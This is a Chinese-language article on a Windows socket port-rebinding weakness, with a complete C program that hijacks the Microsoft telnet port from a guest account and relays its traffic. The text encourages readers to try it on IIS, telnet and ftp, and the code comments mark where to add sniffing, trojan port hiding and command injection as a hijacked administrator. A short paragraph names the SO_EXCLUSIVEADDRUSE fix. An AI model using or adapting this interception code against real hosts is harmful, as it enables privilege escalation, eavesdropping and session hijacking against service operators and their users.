|
榮譽會員
|
連接阜截聽實現連接阜隱藏,嗅探與攻擊
在WINDOWS的SOCKET伺服器套用的編程中,如下的語句或許比比都是:
s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = htonl(INADDR_ANY);
bind(s,(SOCKADDR *)&saddr,sizeof(saddr));
其實這當中存在在非常大的安全隱患,因為在winsock的實現中,對於伺服器的綁定是可以多重綁定的,在確定多重綁定使用誰的時候,根據一條原則是誰的指定最明確則將包遞交給誰,而且沒有權限之分,也就是說低級權限的用戶是可以重綁定在進階權限如服務啟動的連接阜上的,這是非常重大的一個安全隱患。
這意味著什麼?意味著可以進行如下的攻擊:
1。一個木馬綁定到一個已經合法存在的連接阜上進行連接阜的隱藏,他通過自己特定的包格式判斷是不是自己的包,如果是自己處理,如果不是通過127.0.0.1的位址交給真正的伺服器套用進行處理。
2。一個木馬可以在低權限用戶上綁定高權限的服務套用的連接阜,進行該處理訊息的嗅探,本來在一個主機上監聽一個SOCKET的通訊需要具備非常高的權限要求,但其實利用SOCKET重綁定,你可以輕易的監聽具備這種SOCKET編程漏洞的通訊,而無須採用什麼掛接,引上鉤或低層的驅動技術(這些都需要具備管理員權限才能達到)
3。針對一些的特殊套用,可以發起中間人攻擊,從低權限用戶上獲得訊息或事實欺騙,如在guest權限下攔截telnet伺服器的23連接阜,如果是採用NTLM加密認證,雖然你無法通過嗅探直接獲取密碼,但一旦有admin用戶通過你登入以後,你的套用就完全可以發起中間人攻擊,扮演這個登入的用戶通過SOCKET傳送高權限的指令,到達入侵的目的。
4.對於構建的WEB伺服器,入侵者只需要獲得低級的權限,就可以完全達到更改網頁目的,很簡單,扮演你的伺服器給予連接請求以其他訊息的回應,甚至是關於電子商務上的欺騙,獲取非法的資料。
其實,MS自己的很多服務的SOCKET編程都存在這樣的問題,telnet,ftp,http的服務實現全部都可以利用這種方法進行攻擊,在低權限用戶上實現對SYSTEM套用的截聽。包括W2K+SP3的IIS也都一樣,那麼如果你已經可以以低權限用戶入侵或木馬植入的話,而且對方又開啟了這些服務的話,那就不妨一試。並且我估計還有很多第三方的服務也大多存在這個漏洞。
解決的方法很簡單,在編寫如上套用的時候,綁定前需要使用setsockopt指定SO_EXCLUSIVEADDRUSE要求獨佔所有的連接阜位址,而不允許復用。這樣其他人就無法復用這個連接阜了。
下面就是一個簡單的截聽ms telnet伺服器的例子,在GUEST用戶下都能成功進行截聽,剩餘的就是大家根據自己的需要,進行一些特殊剪裁的問題了:如是隱藏,嗅探資料,高權限用戶欺騙等。
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
DWORD WINAPI ClientThread(LPVOID lpParam);
int main()
{
WORD wVersionRequested;
DWORD ret;
WSADATA wsaData;
BOOL val;
SOCKADDR_IN saddr;
SOCKADDR_IN scaddr;
int err;
SOCKET s;
SOCKET sc;
int caddsize;
HANDLE mt;
DWORD tid;
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 ) {
printf("error!WSAStartup failed!\n");
return -1;
}
saddr.sin_family = AF_INET;
//截聽雖然也可以將位址指定為INADDR_ANY,但是要不能影響正常套用情況下,應該指定具體的IP,留下127.0.0.1給正常的服務套用,然後利用這個位址進行轉發,就可以不影響對方正常套用了
saddr.sin_addr.s_addr = inet_addr("192.168.0.60");
saddr.sin_port = htons(23);
if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
printf("error!socket failed!\n");
return -1;
}
val = TRUE;
//SO_REUSEADDR選項就是可以實現連接阜重綁定的
if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0)
{
printf("error!setsockopt failed!\n");
return -1;
}
//如果指定了SO_EXCLUSIVEADDRUSE,就不會綁定成功,返回無權限的錯誤程式碼;
//如果是想通過重利用連接阜達到隱藏的目的,就可以動態的測試當前已綁定的連接阜哪個可以成功,就說明具備這個漏洞,然後動態利用連接阜使得更隱蔽
//其實UDP連接阜一樣可以這樣重綁定利用,這兒主要是以TELNET服務為例子進行攻擊
if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR)
{
ret=GetLastError();
printf("error!bind failed!\n");
return -1;
}
listen(s,2);
while(1)
{
caddsize = sizeof(scaddr);
//接受連接請求
sc = accept(s,(struct sockaddr *)&scaddr,&caddsize);
if(sc!=INVALID_SOCKET)
{
mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid);
if(mt==NULL)
{
printf("Thread Creat Failed!\n");
break;
}
}
CloseHandle(mt);
}
closesocket(s);
WSACleanup();
return 0;
}
DWORD WINAPI ClientThread(LPVOID lpParam)
{
SOCKET ss = (SOCKET)lpParam;
SOCKET sc;
unsigned char buf[4096];
SOCKADDR_IN saddr;
long num;
DWORD val;
DWORD ret;
//如果是隱藏連接阜套用的話,可以在此處加一些判斷
//如果是自己的包,就可以進行一些特殊處理,不是的話通過127.0.0.1進行轉發
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = inet_addr("127.0.0.1");
saddr.sin_port = htons(23);
if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
printf("error!socket failed!\n");
return -1;
}
val = 100;
if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
{
ret = GetLastError();
return -1;
}
if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
{
ret = GetLastError();
return -1;
}
if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0)
{
printf("error!socket connect failed!\n");
closesocket(sc);
closesocket(ss);
return -1;
}
while(1)
{
//下面的程式碼主要是實現通過127。0。0。1這個位址把包轉發到真正的套用上,並把回應的包再轉發回去。
//如果是嗅探內容的話,可以再此處進行內容分析和記錄
//如果是攻擊如TELNET伺服器,利用其高權限登入用戶的話,可以分析其登入用戶,然後利用傳送特定的包以劫持的用戶身份執行。
num = recv(ss,buf,4096,0);
if(num>0)
send(sc,buf,num,0);
else if(num==0)
break;
num = recv(sc,buf,4096,0);
if(num>0)
send(ss,buf,num,0);
else if(num==0)
break;
}
closesocket(ss);
closesocket(sc);
return 0 ;
}
|